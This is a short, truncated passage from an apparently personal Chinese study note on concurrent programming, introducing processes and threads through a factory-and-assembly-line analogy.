前言 菜某的笔记总结分享。有错误请指正。 并发编程的意义 并发编程是用来提升代码执行的效率的。 名词理解 进程和线程 我们可以这样理解进程和线程。进程是一个工厂&#xff0c;线程是工厂里的一条流水线。 我们要让我们产品的生产效率提高&#xff0c;我们可以多开工…